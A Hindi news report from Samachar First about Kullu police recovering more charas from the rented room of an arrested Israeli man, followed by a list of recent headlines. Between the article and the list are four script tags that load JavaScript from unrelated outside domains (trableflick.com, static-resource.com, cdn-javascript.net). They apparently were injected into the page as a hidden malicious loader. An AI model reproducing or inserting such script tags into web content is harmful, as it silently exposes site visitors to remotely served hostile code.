कुल्लूः गिरफ्तार इजराइली के कमरे से डेढ़ किलोग्राम चरस बरामद

<p>जिला कुल्लू पुलिस द्वारा ढाई किलोग्राम चरस के साथ गिरफ्तार किए गए विदेशी नागरिक के कमरे से डेढ़ किलोग्राम चरस और बरामद की गई है। जानकारी के अनुसार जिस विदेशी नागरिक से कुल्लू पुलिस ने ढ़ाई किलोग्राम चरस बरामद की थी उसे मंगलवार को न्यायालय में पेश किया गया। जहां से उसे 6 फरवरी तक पुलिस हिरासत में भेज दिया गया है। इस दौरान जब कुल्लू पुलिस ने उक्त विदेशी के वशिष्ठ में लिए गए किराए के कमरे में दबिश दी तो वहां भी पुलिस ने डेढ़ किलोग्राम चरस और बरामद की है।</p>

<p>एसपी कुल्लू गौरव सिंह ने बताया कि इस केस में इस्राइली आरोपी शौल बोरोव से 2.5 किलो चरस बरामद करने के बाद सारी कानूनी कार्रवाई को पूरा करके आरोपी को कोर्ट में पेश किया गया। जहां से उसे 6 फरवरी तक की पुलिस हिरासत दी गई जिसमें आगामी तफ्तीश करते हुए आरोपी के वशिष्ठ में लिए गए किराए के कमरे की तलाशी ली गई जो वहां से आरोपी के बक्से से 10 उसी प्रकार के बाउल्स, खुली चरस और पैकिंग का सामान भी बरामद किया गया। बाउल्स के अंदर से भी चरस बरामद की गई। वहां से 1.552 किलो चरस बरामद हुई है। आरोपी से कुल 4.052 किलो चरस बरामद की गई है। पुलिस आगे की जांच कर रही है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1580873328745″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Himachal: शिमला लौटे सीएम सुक्खू, अगले सप्ताह कैबिनेट बैठक

CM Sukhu Returns to Shimla: दिल्ली में अखिल भारतीय कांग्रेस कमेटी के अध्यक्ष मल्लिकार्जुन खड़गे…

35 mins ago

6 अक्टूबर 2024 का राशिफल: जानें, आपके दिन का हाल

  मेष (चू, चे, चो, ला, ली, लू, ले, लो, अ) आर्थिक दृष्टिकोण से आज…

48 mins ago

Video: भारत ने कम दूरी की वायु रक्षा मिसाइल प्रणाली का किया सफल परीक्षण

  नई दिल्ली: भारत ने राजस्थान के पोखरण फायरिंग रेंज में बहुत ही कम दूरी…

18 hours ago

Himachal: जेपी नड्डा बोले- आजकल राहुल गांधी अर्बन नक्सल, देश को तोड़ने वालों की भाषा बोल रहे

  नाहन: भाजपा के राष्ट्रीय अध्यक्ष जेपी नड्डा ने हिमाचल प्रदेश के नाहन में आयोजित…

19 hours ago

राहुल गांधी शिवाजी महाराज की प्रतिमा का अनावरण करते हुए भाजपा पर हमलावर, बोले- संविधान बर्बाद कर शीश झुकाने का कोई मतलब नहीं

Kohlapur/Agencies: कांग्रेस नेता राहुल गांधी ने शनिवार को कोल्हापुर में मराठा साम्राज्य के संस्थापक छत्रपति…

19 hours ago